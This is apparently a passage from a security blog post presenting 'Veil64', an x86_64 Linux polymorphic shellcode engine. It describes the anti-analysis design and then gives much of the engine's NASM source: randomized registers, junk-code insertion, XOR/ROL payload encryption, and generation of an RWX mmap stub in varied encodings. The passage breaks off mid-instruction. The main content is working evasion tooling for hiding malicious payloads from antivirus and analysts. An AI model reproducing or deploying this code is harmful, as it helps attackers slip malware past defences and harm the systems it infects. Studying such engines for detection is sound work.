distinctly different from a signature-detection perspective.</p> <p>Effective polymorphism maximizes signature diversity without degrading correctness. Generating billions of variants is meaningless if many are broken or still share detectable patterns. Correctness and diversity scale must hold simultaneously.</p> <h3> — Built-in Anti-Analysis Design — </h3> <p>Emulation engines usually struggle with variable timing, and junk code injection creates unpredictable execution durations. Key generation dependent on stack state makes the same variant behave differently across process contexts. Reliance on hardware timestamps further increases emulation cost because it requires accurate RDTSC simulation.</p> <p>With no fixed constants or strings, static analysis tools struggle because there are almost no grep-able or fingerprintable anchors. Polymorphic control flow breaks linear analysis, while the encrypted embedded engine hides core logic until runtime.</p> <p>Dynamic analysis is also disrupted by “legitimate-looking, functionally neutral” junk code. Multiple execution paths generate different behavioral traces on every run. Runtime key derivation ensures each execution has a unique key, making results difficult to reuse even if tracing succeeds.</p> <p>Anti-analysis features are not optional — they are part of the system. Every polymorphic technique serves two purposes simultaneously: evading signatures and increasing analysis cost.</p> <h3> Veil64 Full Source Code </h3> <div class="highlight js-code-highlight"> <pre class="highlight nasm"><code><span class="c1">;------------------------------------------------------------</span> <span class="c1">; [ V E I L 6 4 ]</span> <span class="c1">;------------------------------------------------------------</span> <span class="c1">; Type: Polymorphic Engine / Stub Generator</span> <span class="c1">; Platform: x86_64 Linux</span> <span class="c1">; Size: ~4KB Engine + Custom Stub</span> <span class="c1">; Runtime shellcode obfuscation, encryption,</span> <span class="c1">; and stealth execution via mmap + RIP tricks.</span> <span class="c1">;</span> <span class="c1">; 0xf00sec</span> <span class="c1">;------------------------------------------------------------</span> <span class="nf">section</span> <span class="nv">.text</span> <span class="nf">global</span> <span class="nv">genrat</span> <span class="nf">global</span> <span class="nv">exec_c</span> <span class="nf">global</span> <span class="nv">_start</span> <span class="c1">; x64 opcodes</span> <span class="cp">%define PUSH_REG 0x50 %define POP_REG 0x58 %define ADD_MEM_REG 0x01 %define ADD_REG_IMM8 0x83 %define ROL_MEM_IMM 0xC1 %define XOR_MEM_REG 0x31 %define TEST_REG_REG 0x85 %define JNZ_SHORT 0x75 %define JZ_SHORT 0x74 %define CALL_REL32 0xE8 %define JMP_REL32 0xE9 %define JMP_SHORT 0xEB %define RET_OPCODE 0xC3 %define NOP_OPCODE 0x90 %define JNZ_LONG 0x0F85 %define FNINIT_OPCODE 0xDBE3 %define FNOP_OPCODE 0xD9D0 </span> <span class="c1">; register encoding</span> <span class="cp">%define REG_RAX 0 %define REG_RCX 1 %define REG_RDX 2 %define REG_RBX 3 %define REG_RSP 4 %define REG_RBP 5 %define REG_RSI 6 %define REG_RDI 7 </span> <span class="nf">section</span> <span class="nv">.data</span> <span class="nl">stub_key:</span> <span class="kd">dq</span> <span class="mh">0xDEADBEEF</span> <span class="c1">; runtime key</span> <span class="nl">sec_key:</span> <span class="kd">dq</span> <span class="mh">0x00000000</span> <span class="nl">engine_size:</span> <span class="kd">dq</span> <span class="mi">0</span> <span class="nl">dcr_eng:</span> <span class="kd">dq</span> <span class="mi">0</span> <span class="nl">stub_sz:</span> <span class="kd">dq</span> <span class="mi">0</span> <span class="nl">sz:</span> <span class="kd">dq</span> <span class="mi">0</span> <span class="nl">seed:</span> <span class="kd">dq</span> <span class="mi">0</span> <span class="c1">; PRNG state</span> <span class="nl">p_entry:</span> <span class="kd">dq</span> <span class="mi">0</span> <span class="c1">; output buffer</span> <span class="nl">key:</span> <span class="kd">dq</span> <span class="mi">0</span> <span class="c1">; user key</span> <span class="nl">reg_base:</span> <span class="kd">db</span> <span class="mi">0</span> <span class="c1">; selected registers</span> <span class="nl">reg_count:</span> <span class="kd">db</span> <span class="mi">0</span> <span class="nl">reg_key:</span> <span class="kd">db</span> <span class="mi">0</span> <span class="nl">junk_reg1:</span> <span class="kd">db</span> <span class="mi">0</span> <span class="c1">; junk registers</span> <span class="nl">junk_reg2:</span> <span class="kd">db</span> <span class="mi">0</span> <span class="nl">junk_reg3:</span> <span class="kd">db</span> <span class="mi">0</span> <span class="nl">prolog_set:</span> <span class="kd">db</span> <span class="mi">0</span> <span class="nl">fpu_set:</span> <span class="kd">db</span> <span class="mi">0</span> <span class="nl">jmp_back:</span> <span class="kd">dq</span> <span class="mi">0</span> <span class="nl">alg0_dcr:</span> <span class="kd">db</span> <span class="mi">0</span> <span class="c1">; algorithm selector</span> <span class="nf">align</span> <span class="mi">16</span> <span class="nl">entry:</span> <span class="kd">times</span> <span class="mi">4096</span> <span class="nv">db</span> <span class="mi">0</span> <span class="c1">; engine storage</span> <span class="nl">exit:</span> <span class="nf">section</span> <span class="nv">.text</span> <span class="c1">; main generator entry point</span> <span class="nl">genrat:</span> <span class="nf">push</span> <span class="nb">rbp</span> <span class="nf">mov</span> <span class="nb">rbp</span><span class="p">,</span> <span class="nb">rsp</span> <span class="nf">sub</span> <span class="nb">rsp</span><span class="p">,</span> <span class="mi">64</span> <span class="nf">push</span> <span class="nb">rbx</span> <span class="nf">push</span> <span class="nv">r12</span> <span class="nf">push</span> <span class="nv">r13</span> <span class="nf">push</span> <span class="nv">r14</span> <span class="nf">push</span> <span class="nv">r15</span> <span class="nf">test</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rdi</span> <span class="c1">; validate params</span> <span class="nf">jz</span> <span class="nv">.r_exit</span> <span class="nf">test</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rsi</span> <span class="nf">jz</span> <span class="nv">.r_exit</span> <span class="nf">cmp</span> <span class="nb">rsi</span><span class="p">,</span> <span class="mi">1024</span> <span class="c1">; min buffer size</span> <span class="nf">jb</span> <span class="nv">.r_exit</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">p_entry</span><span class="p">],</span> <span class="nb">rdi</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">sz</span><span class="p">],</span> <span class="nb">rsi</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">key</span><span class="p">],</span> <span class="nb">rdx</span> <span class="nf">call</span> <span class="nv">gen_runtm</span> <span class="c1">; generate runtime keys</span> <span class="nf">lea</span> <span class="nb">rdi</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">entry</span><span class="p">]</span> <span class="nf">mov</span> <span class="nv">r12</span><span class="p">,</span> <span class="nb">rdi</span> <span class="nf">call</span> <span class="nv">gen_reng</span> <span class="c1">; build engine</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rdi</span> <span class="c1">; calculate engine size</span> <span class="nf">sub</span> <span class="nb">rax</span><span class="p">,</span> <span class="nv">r12</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">engine_size</span><span class="p">],</span> <span class="nb">rax</span> <span class="nf">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">p_entry</span><span class="p">]</span> <span class="nf">call</span> <span class="nv">unpack_stub</span> <span class="c1">; build stub</span> <span class="nf">call</span> <span class="nv">enc_bin</span> <span class="c1">; encrypt payload</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">stub_sz</span><span class="p">]</span> <span class="c1">; total</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">jnz</span> <span class="nv">.calc_sz</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rdi</span> <span class="nf">sub</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">p_entry</span><span class="p">]</span> <span class="nl">.calc_sz:</span> <span class="nf">pop</span> <span class="nv">r15</span> <span class="nf">pop</span> <span class="nv">r14</span> <span class="nf">pop</span> <span class="nv">r13</span> <span class="nf">pop</span> <span class="nv">r12</span> <span class="nf">pop</span> <span class="nb">rbx</span> <span class="nf">add</span> <span class="nb">rsp</span><span class="p">,</span> <span class="mi">64</span> <span class="nf">pop</span> <span class="nb">rbp</span> <span class="nf">ret</span> <span class="nl">.r_exit:</span> <span class="nf">xor</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">pop</span> <span class="nv">r15</span> <span class="nf">pop</span> <span class="nv">r14</span> <span class="nf">pop</span> <span class="nv">r13</span> <span class="nf">pop</span> <span class="nv">r12</span> <span class="nf">pop</span> <span class="nb">rbx</span> <span class="nf">add</span> <span class="nb">rsp</span><span class="p">,</span> <span class="mi">64</span> <span class="nf">pop</span> <span class="nb">rbp</span> <span class="nf">ret</span> <span class="c1">; generate engine</span> <span class="nl">gen_reng:</span> <span class="nf">push</span> <span class="nb">rdi</span> <span class="nf">push</span> <span class="nb">rsi</span> <span class="nf">push</span> <span class="nb">rcx</span> <span class="nf">rdtsc</span> <span class="nf">xor</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">key</span><span class="p">]</span> <span class="nf">mov</span> <span class="nb">rbx</span><span class="p">,</span> <span class="mh">0x5DEECE66D</span> <span class="nf">xor</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rbx</span> <span class="nf">mov</span> <span class="nb">rbx</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">shl</span> <span class="nb">rbx</span><span class="p">,</span> <span class="mi">13</span> <span class="nf">xor</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rbx</span> <span class="nf">mov</span> <span class="nb">rbx</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">shr</span> <span class="nb">rbx</span><span class="p">,</span> <span class="mi">17</span> <span class="nf">xor</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rbx</span> <span class="nf">mov</span> <span class="nb">rbx</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">shl</span> <span class="nb">rbx</span><span class="p">,</span> <span class="mi">5</span> <span class="nf">xor</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rbx</span> <span class="nf">xor</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rsp</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">seed</span><span class="p">],</span> <span class="nb">rax</span> <span class="nf">push</span> <span class="nb">rdi</span> <span class="c1">; clear state</span> <span class="nf">lea</span> <span class="nb">rdi</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">reg_base</span><span class="p">]</span> <span class="nf">mov</span> <span class="nb">rcx</span><span class="p">,</span> <span class="mi">16</span> <span class="nf">xor</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">rep</span> <span class="nv">stosb</span> <span class="nf">pop</span> <span class="nb">rdi</span> <span class="nf">pop</span> <span class="nb">rcx</span> <span class="nf">pop</span> <span class="nb">rsi</span> <span class="nf">pop</span> <span class="nb">rdi</span> <span class="nf">call</span> <span class="nv">get_rr</span> <span class="c1">; select random registers</span> <span class="nf">call</span> <span class="nv">set_al</span> <span class="c1">; pick decrypt algorithm</span> <span class="nf">call</span> <span class="nv">gen_p</span> <span class="c1">; generate prologue</span> <span class="nf">call</span> <span class="nv">yes_no</span> <span class="c1">; random junk insertion</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">jz</span> <span class="nv">.skip_pr</span> <span class="nf">call</span> <span class="nv">gen_trash</span> <span class="nl">.skip_pr:</span> <span class="nf">call</span> <span class="nv">trash</span> <span class="nf">call</span> <span class="nv">yes_no</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">jz</span> <span class="nv">.skip_dummy</span> <span class="nf">call</span> <span class="nv">gen_dummy</span> <span class="nl">.skip_dummy:</span> <span class="nf">call</span> <span class="nv">gen_dec</span> <span class="c1">; main decrypt loop</span> <span class="nf">call</span> <span class="nv">yes_no</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">jz</span> <span class="nv">.skip_prc</span> <span class="nf">call</span> <span class="nv">gen_trash</span> <span class="nl">.skip_prc:</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">RET_OPCODE</span> <span class="nf">stosb</span> <span class="nf">cmp</span> <span class="kt">qword</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">jmp_back</span><span class="p">],</span> <span class="mi">0</span> <span class="c1">; conditional jump back</span> <span class="nf">je</span> <span class="nv">.skip_jmp</span> <span class="nf">mov</span> <span class="nb">ax</span><span class="p">,</span> <span class="nv">JNZ_LONG</span> <span class="nf">stosw</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">jmp_back</span><span class="p">]</span> <span class="nf">sub</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rdi</span> <span class="nf">sub</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">4</span> <span class="nf">stosd</span> <span class="nl">.skip_jmp:</span> <span class="nf">call</span> <span class="nv">trash</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="nv">RET_OPCODE</span> <span class="nf">stosb</span> <span class="nf">ret</span> <span class="c1">; encrypt generated engine</span> <span class="nl">enc_bin:</span> <span class="nf">push</span> <span class="nb">rdi</span> <span class="nf">push</span> <span class="nb">rsi</span> <span class="nf">push</span> <span class="nb">rcx</span> <span class="nf">push</span> <span class="nb">rax</span> <span class="nf">push</span> <span class="nb">rbx</span> <span class="nf">lea</span> <span class="nb">rdi</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">entry</span><span class="p">]</span> <span class="nf">mov</span> <span class="nb">rcx</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">engine_size</span><span class="p">]</span> <span class="c1">; validate engine size</span> <span class="nf">test</span> <span class="nb">rcx</span><span class="p">,</span> <span class="nb">rcx</span> <span class="nf">jz</span> <span class="nv">.enc_done</span> <span class="nf">cmp</span> <span class="nb">rcx</span><span class="p">,</span> <span class="mi">4096</span> <span class="nf">ja</span> <span class="nv">.enc_done</span> <span class="nf">cmp</span> <span class="nb">rcx</span><span class="p">,</span> <span class="mi">10</span> <span class="nf">jb</span> <span class="nv">.enc_done</span> <span class="c1">; encrypt in place</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">stub_key</span><span class="p">]</span> <span class="nf">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rcx</span> <span class="nl">.enc_loop:</span> <span class="nf">test</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rsi</span> <span class="nf">jz</span> <span class="nv">.enc_done</span> <span class="nf">xor</span> <span class="kt">byte</span> <span class="p">[</span><span class="nb">rdi</span><span class="p">],</span> <span class="nb">al</span> <span class="nf">rol</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">7</span> <span class="nf">inc</span> <span class="nb">rdi</span> <span class="nf">dec</span> <span class="nb">rsi</span> <span class="nf">jmp</span> <span class="nv">.enc_loop</span> <span class="nl">.enc_done:</span> <span class="nf">pop</span> <span class="nb">rbx</span> <span class="nf">pop</span> <span class="nb">rax</span> <span class="nf">pop</span> <span class="nb">rcx</span> <span class="nf">pop</span> <span class="nb">rsi</span> <span class="nf">pop</span> <span class="nb">rdi</span> <span class="nf">ret</span> <span class="c1">; build stub wrapper</span> <span class="nl">unpack_stub:</span> <span class="nf">push</span> <span class="nb">rbx</span> <span class="nf">push</span> <span class="nb">rcx</span> <span class="nf">push</span> <span class="nb">rdx</span> <span class="nf">push</span> <span class="nv">r12</span> <span class="nf">mov</span> <span class="nv">r12</span><span class="p">,</span> <span class="nb">rdi</span> <span class="nf">call</span> <span class="nv">bf_boo</span> <span class="c1">; bounds check</span> <span class="nf">jae</span> <span class="nv">.stub_flow</span> <span class="nf">call</span> <span class="nv">stub_trash</span> <span class="nf">call</span> <span class="nv">gen_stub_mmap</span> <span class="nf">call</span> <span class="nv">stub_decrypt</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rdi</span> <span class="nf">sub</span> <span class="nb">rax</span><span class="p">,</span> <span class="nv">r12</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">stub_sz</span><span class="p">],</span> <span class="nb">rax</span> <span class="nf">call</span> <span class="nv">stub_trash</span> <span class="c1">; update size after junk</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rdi</span> <span class="nf">sub</span> <span class="nb">rax</span><span class="p">,</span> <span class="nv">r12</span> <span class="c1">; check space for encrypted engine</span> <span class="nf">mov</span> <span class="nb">rbx</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">add</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">engine_size</span><span class="p">]</span> <span class="nf">cmp</span> <span class="nb">rax</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">sz</span><span class="p">]</span> <span class="nf">ja</span> <span class="nv">.stub_flow</span> <span class="c1">; embed encrypted engine</span> <span class="nf">lea</span> <span class="nb">rsi</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">entry</span><span class="p">]</span> <span class="nf">mov</span> <span class="nb">rcx</span><span class="p">,</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">engine_size</span><span class="p">]</span> <span class="nf">test</span> <span class="nb">rcx</span><span class="p">,</span> <span class="nb">rcx</span> <span class="nf">jz</span> <span class="nv">.skip_embed</span> <span class="nf">rep</span> <span class="nv">movsb</span> <span class="nl">.skip_embed:</span> <span class="c1">; final size calculation</span> <span class="nf">mov</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rdi</span> <span class="nf">sub</span> <span class="nb">rax</span><span class="p">,</span> <span class="nv">r12</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">stub_sz</span><span class="p">],</span> <span class="nb">rax</span> <span class="nf">pop</span> <span class="nv">r12</span> <span class="nf">pop</span> <span class="nb">rdx</span> <span class="nf">pop</span> <span class="nb">rcx</span> <span class="nf">pop</span> <span class="nb">rbx</span> <span class="nf">ret</span> <span class="nl">.stub_flow:</span> <span class="nf">xor</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">mov</span> <span class="p">[</span><span class="nv">rel</span> <span class="nv">stub_sz</span><span class="p">],</span> <span class="nb">rax</span> <span class="nf">pop</span> <span class="nv">r12</span> <span class="nf">pop</span> <span class="nb">rdx</span> <span class="nf">pop</span> <span class="nb">rcx</span> <span class="nf">pop</span> <span class="nb">rbx</span> <span class="nf">ret</span> <span class="c1">; generate stub junk</span> <span class="nl">stub_trash:</span> <span class="nf">call</span> <span class="nv">next_random</span> <span class="nf">and</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">7</span> <span class="c1">; 0-7 junk instructions</span> <span class="nf">mov</span> <span class="nb">rcx</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">test</span> <span class="nb">rcx</span><span class="p">,</span> <span class="nb">rcx</span> <span class="nf">jz</span> <span class="nv">.no_garbage</span> <span class="nl">.trash_loop:</span> <span class="nf">call</span> <span class="nv">next_random</span> <span class="nf">and</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">3</span> <span class="c1">; choose junk type</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="mi">0</span> <span class="nf">je</span> <span class="nv">.gen_nop</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="mi">1</span> <span class="nf">je</span> <span class="nv">.gen_push_pop</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="mi">2</span> <span class="nf">je</span> <span class="nv">.gen_xor_self</span> <span class="nf">jmp</span> <span class="nv">.gen_mov_reg</span> <span class="nl">.gen_nop:</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x90</span> <span class="nf">stosb</span> <span class="nf">jmp</span> <span class="nv">.next_garbage</span> <span class="nl">.gen_push_pop:</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x50</span> <span class="c1">; push rax</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x58</span> <span class="c1">; pop rax</span> <span class="nf">stosb</span> <span class="nf">jmp</span> <span class="nv">.next_garbage</span> <span class="nl">.gen_xor_self:</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="c1">; rex.w</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x31</span> <span class="c1">; xor rax,rax</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC0</span> <span class="nf">stosb</span> <span class="nf">jmp</span> <span class="nv">.next_garbage</span> <span class="nl">.gen_mov_reg:</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="c1">; rex.w</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x89</span> <span class="c1">; mov rax,rax</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC0</span> <span class="nf">stosb</span> <span class="nl">.next_garbage:</span> <span class="nf">loop</span> <span class="nv">.trash_loop</span> <span class="nl">.no_garbage:</span> <span class="nf">ret</span> <span class="c1">; generate mmap syscall stub</span> <span class="nl">gen_stub_mmap:</span> <span class="c1">; mmap setup</span> <span class="nf">call</span> <span class="nv">next_random</span> <span class="nf">and</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">3</span> <span class="c1">; choose method</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="mi">0</span> <span class="nf">je</span> <span class="nv">.mmap_method_0</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="mi">1</span> <span class="nf">je</span> <span class="nv">.mmap_method_1</span> <span class="nf">cmp</span> <span class="nb">al</span><span class="p">,</span> <span class="mi">2</span> <span class="nf">je</span> <span class="nv">.mmap_method_2</span> <span class="nf">jmp</span> <span class="nv">.mmap_method_3</span> <span class="nl">.mmap_method_0:</span> <span class="c1">; mov rax, 9</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC7</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC0</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="mi">9</span> <span class="c1">; mmap syscall</span> <span class="nf">stosd</span> <span class="nf">jmp</span> <span class="nv">.mm_continue</span> <span class="nl">.mmap_method_1:</span> <span class="c1">; xor rax,rax; add rax,9</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x31</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC0</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x83</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC0</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mi">9</span> <span class="nf">stosb</span> <span class="nf">jmp</span> <span class="nv">.mm_continue</span> <span class="nl">.mmap_method_2:</span> <span class="c1">; mov rax,10; dec rax</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC7</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC0</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="mi">10</span> <span class="nf">stosd</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xFF</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC8</span> <span class="nf">stosb</span> <span class="nf">jmp</span> <span class="nv">.mm_continue</span> <span class="nl">.mmap_method_3:</span> <span class="c1">; mov rax,18; shr rax,1</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC7</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC0</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="mi">18</span> <span class="nf">stosd</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xD1</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xE8</span> <span class="nf">stosb</span> <span class="nl">.mm_continue:</span> <span class="nf">call</span> <span class="nv">stub_trash</span> <span class="c1">; rdi setup</span> <span class="nf">call</span> <span class="nv">next_random</span> <span class="nf">and</span> <span class="nb">rax</span><span class="p">,</span> <span class="mi">1</span> <span class="nf">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span> <span class="nf">jz</span> <span class="nv">.rdi_method_0</span> <span class="c1">; mov rdi,0</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC7</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC7</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="mi">0</span> <span class="nf">stosd</span> <span class="nf">jmp</span> <span class="nv">.rdi_done</span> <span class="nl">.rdi_method_0:</span> <span class="c1">; xor rdi,rdi</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x31</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xFF</span> <span class="nf">stosb</span> <span class="nl">.rdi_done:</span> <span class="c1">; mov rsi,4096</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC7</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC6</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="mi">4096</span> <span class="nf">stosd</span> <span class="c1">; mov rdx,7 (rwx)</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x48</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC7</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC2</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="mi">7</span> <span class="nf">stosd</span> <span class="c1">; mov r10,0x22 (private|anon)</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x49</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC7</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC2</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="mh">0x22</span> <span class="nf">stosd</span> <span class="c1">; mov r8,-1</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x49</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC7</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC0</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">eax</span><span class="p">,</span> <span class="mh">0xFFFFFFFF</span> <span class="nf">stosd</span> <span class="c1">; mov r9,0</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x4D</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x31</span> <span class="nf">stosb</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0xC9</span> <span class="nf">stosb</span> <span class="c1">; syscall</span> <span class="nf">mov</span> <span class="nb">al</span><span class="p">,</span> <span class="mh">0x0F</span> 